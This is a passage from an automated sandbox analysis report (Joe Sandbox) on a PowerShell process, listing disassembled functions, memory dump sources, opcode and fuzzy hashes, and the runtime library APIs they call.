                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac5b0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 96a5df5f8c7ae943c2ba690d79a85876847a0740adfc9699ce83330a04c24cf9
                                                                                                                                                                                                                                                        • Instruction ID: 18eb1a2578df6d7cc7f3e2a2e43d7090554e924689affefadce49428c8c5f756
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96a5df5f8c7ae943c2ba690d79a85876847a0740adfc9699ce83330a04c24cf9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CAB1E66394D7C68FE312A77CA8A95E57F60EF43328B0883FBD0D98A1E3ED04544992D5
                                                                                                                                                                                                                                                        Function 00007FFAAC686633 Relevance: .3, Instructions: 257COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406887584.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac680000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 8a47a285994e984d686334ffb7f2d92320a1583dc7ff78adfb04b6a8cab7b51a
                                                                                                                                                                                                                                                        • Instruction ID: 767e58946aeaa51aefe1b7a079e26d5e3707a3d97dd9d08b35f8236205f576f3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a47a285994e984d686334ffb7f2d92320a1583dc7ff78adfb04b6a8cab7b51a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4481D5A591EBC68FF766D76848655747FA1EF46300F48A0FAD04DCB1D3CA18DD098392
                                                                                                                                                                                                                                                        Function 00007FFAAC49E380 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406189262.00007FFAAC49D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC49D000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac49d000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 5164b136bd71875fc70c61e2beb64d3a456423a70a9c8dc87dd46bb27aeb085e
                                                                                                                                                                                                                                                        • Instruction ID: ecec3fd9fd47dc69b4929dec5256dc1f9351bb36f8317f137ec47959b281b10a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5164b136bd71875fc70c61e2beb64d3a456423a70a9c8dc87dd46bb27aeb085e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C41077140EBC48FE7668B29D8459523FB0EF53314B1545EFD48CCB1A3D629E84AC792
                                                                                                                                                                                                                                                        Function 00007FFAAC5BA47C Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406557466.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac5b0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 0af73c730b7da70cc60af012fe17b99351b2012e446e7a98e71e928ac10731f0
                                                                                                                                                                                                                                                        • Instruction ID: fef0c2d6cdd7f0fac36d3176707d2829d1519ea81c0d82f9999a89104c1e61d0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0af73c730b7da70cc60af012fe17b99351b2012e446e7a98e71e928ac10731f0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75210A3190C64C8FEB59DB6CD84A7E97FF0EBA6321F04426BD049C3156DA74A44ACB91
                                                                                                                                                                                                                                                        Function 00007FFAAC5B33B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406557466.00007FFAAC5B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC5B0000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac5b0000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ed3fc5a0107bc77391bf7315d42e33cbbb4e9fb4edc30b969599d7aafc0b271c
                                                                                                                                                                                                                                                        • Instruction ID: 9734953e55ba6020dfa6fd68283ddc5c6f3e0e898dd62d03ef2e06dc28d86645
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed3fc5a0107bc77391bf7315d42e33cbbb4e9fb4edc30b969599d7aafc0b271c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CB01A77010CB0C8FD744EF0CE051AA6B7E0FB89320F10052DE58AC3661DA32E882CB41
                                                                                                                                                                                                                                                        Function 00007FFAAC68414D Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406887584.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac680000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ae0e2ac27e39b8de39d3eae6466175b5f75fb85d1116c5d1d86d633764c00c92
                                                                                                                                                                                                                                                        • Instruction ID: f8351757faf997665948e5461999e45d18d379568c1b2c5e41a63e02873eaa61
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae0e2ac27e39b8de39d3eae6466175b5f75fb85d1116c5d1d86d633764c00c92
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 39F0BE32A0D5048FE769EB6CE4518B877E0EF5632071250BAE09DC75A3CE25EC44C780
                                                                                                                                                                                                                                                        Function 00007FFAAC684400 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406887584.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac680000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: ba62fd70d78c01348c6fe0e9e915a1fd509b4ccb042f06bf463de8f3fcf03693
                                                                                                                                                                                                                                                        • Instruction ID: e79e6ba5a24f408771ce889b2f68b492b5697206c3f82da4fa49f558f98dba0c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba62fd70d78c01348c6fe0e9e915a1fd509b4ccb042f06bf463de8f3fcf03693
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4DF0BE32A0D5448FE755EB2CE0518B877E0EF46320B0150B6E04DC74A3CF25EC44C780
                                                                                                                                                                                                                                                        Function 00007FFAAC6841D1 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1406887584.00007FFAAC680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC680000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffaac680000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                                                                        • Instruction ID: 2ab32c8e07294f22902429921b07b93cc15ea8cce8bde26e763ad594343393d8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5CE01A31B4C808CFEAA9DB0CE0509B973E1EB9932171161B7D18EC7561CB22ED559BC0

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 00007FFB0815E3F0 Relevance: 24.1, APIs: 9, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfomemcpy_s$fegetenv
                                                                                                                                                                                                                                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                        • API String ID: 281475176-2761157908
                                                                                                                                                                                                                                                        • Opcode ID: 6df54fff1aa2c631989e832b8a329fdd0ff31ad140982d93a5642c80906cd212
                                                                                                                                                                                                                                                        • Instruction ID: df8bc8479394285da20cc878b984b8d4734f7f0767506c4505293aca08b35075
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6df54fff1aa2c631989e832b8a329fdd0ff31ad140982d93a5642c80906cd212
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 10B2C1B2E08282CAE7658E79D440EF927A5FF8C788F505135DA0A57B88DF38E745CB44
                                                                                                                                                                                                                                                        Function 00007FFB081585F4 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: 73eb6f8d3135e80eb604e4a960f381d7b2ee5428bf25402da82f22d1aee29db8
                                                                                                                                                                                                                                                        • Instruction ID: 02a6f145fd848f6e86f659b89127bed08426596327a9d95405e0bb3ce6b0f60d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 73eb6f8d3135e80eb604e4a960f381d7b2ee5428bf25402da82f22d1aee29db8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76316D76618B818AEB608F35E840AAE73A4FF88794F500135EA9E43B95DF3CC655CB04
                                                                                                                                                                                                                                                        Function 00007FFB0815BCB8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FFB0815BCE8
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08158820: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFB081587FE), ref: 00007FFB0815884D
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                        • API String ID: 2518042432-3972193922
                                                                                                                                                                                                                                                        • Opcode ID: e836f971f13d4bc4ab362c8000c6316099b5f1b9b943f0b2e30da496bf3a7900
                                                                                                                                                                                                                                                        • Instruction ID: 65006b3cf3791406638c17157d9176d0b7fdccc339d33b1e64bde0b52550f533
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e836f971f13d4bc4ab362c8000c6316099b5f1b9b943f0b2e30da496bf3a7900
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD51A1A2B18A95C5EB10DF72D8008BD67A5EF58BE8B444531DE5D17B89EF3CD242C304
                                                                                                                                                                                                                                                        Function 00007FFB0815DF20 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: memcpy_s
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1502251526-0
                                                                                                                                                                                                                                                        • Opcode ID: 7c95d79a6932f591ae303023ad9bcf5e3cdb31da0663f78c422ae26a9081d948
                                                                                                                                                                                                                                                        • Instruction ID: 677340b257208edf5606dd80d11561b764a157d837c45028a779b22286faebf2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7c95d79a6932f591ae303023ad9bcf5e3cdb31da0663f78c422ae26a9081d948
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35D1A2B2B19686C7DB74CF25E184A6AB7A1FB8C784F148134DB4E57B44DA3CEA41CB04
                                                                                                                                                                                                                                                        Function 00007FFB0815BEC4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: .
                                                                                                                                                                                                                                                        • API String ID: 0-248832578
                                                                                                                                                                                                                                                        • Opcode ID: 75b22a3948411877a7dfef8ea2be6dba620c082ba57b72eb5d5559a20f22f16b
                                                                                                                                                                                                                                                        • Instruction ID: c6ce91d3f3835cee8c05789439e22a0be24eb95f5cd1f8122bf7f5c58e117f28
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75b22a3948411877a7dfef8ea2be6dba620c082ba57b72eb5d5559a20f22f16b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF31C962B18A9185EB209F36D805BBA6A91AF59FE4F148635DE6C07BC5CE3CD601C708
                                                                                                                                                                                                                                                        Function 00007FFB08164428 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 15204871-0
                                                                                                                                                                                                                                                        • Opcode ID: 53bcff07cb436acb294193aa814ed843fd2dca739895ac1ba270aed5bf7797db
                                                                                                                                                                                                                                                        • Instruction ID: ef6346a74d2a080f4e14ecb3f583f8ae8880bcec22df7b13000c6716fe9f323d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 53bcff07cb436acb294193aa814ed843fd2dca739895ac1ba270aed5bf7797db
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76B14BB7604B858FEB15CF39C8467683BA0FB88B48F158925DA9D837A4CB39D561C708
                                                                                                                                                                                                                                                        Function 00007FFB081613F4 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 474895018-0
                                                                                                                                                                                                                                                        • Opcode ID: 07dc0487f994a6b9fd443410843916217b4e3e2560dccc6d01088311b62779dc
                                                                                                                                                                                                                                                        • Instruction ID: f5d2262d979ad65a6347076818630b8314d089baf66b23954c70b77abc053cc9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07dc0487f994a6b9fd443410843916217b4e3e2560dccc6d01088311b62779dc
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5771E7A2E0C2825EF7644A39D440F79B2D1AF49360F184635DAEF876D5DF7CEA60C608
                                                                                                                                                                                                                                                        Function 00007FFB08154E20 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: 44d903f19fab0e7de568b0240edc409f1afb79d003b79d08c49e9869df03cfc8
                                                                                                                                                                                                                                                        • Instruction ID: 086e5cd16e43f5b387cb23609e665b16a4a4e9261740f7b351f2c980e442f276
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 44d903f19fab0e7de568b0240edc409f1afb79d003b79d08c49e9869df03cfc8
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4E71E4E1A1C242C6FB688A3DD040EBE23919F49748F141536DD488B69ACE3DEBC6C74D
                                                                                                                                                                                                                                                        Function 00007FFB08154BA4 Relevance: 1.4, Strings: 1, Instructions: 199COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: 0
                                                                                                                                                                                                                                                        • API String ID: 3215553584-4108050209
                                                                                                                                                                                                                                                        • Opcode ID: 4f6cdb15184ffe92e9ba612c735e64934ac8ce18441487aeebabd5f7f29ec574
                                                                                                                                                                                                                                                        • Instruction ID: d50b5c5087e9c3730ee499ac52d8b524fdc6250ef0482fde93d65408ff081c51
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f6cdb15184ffe92e9ba612c735e64934ac8ce18441487aeebabd5f7f29ec574
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 547103E1A0C282C6FB688A39C090EBD23919F89748F140535DD4C8B69ACE3DEAC5D74D
                                                                                                                                                                                                                                                        Function 00007FFB081575A4 Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
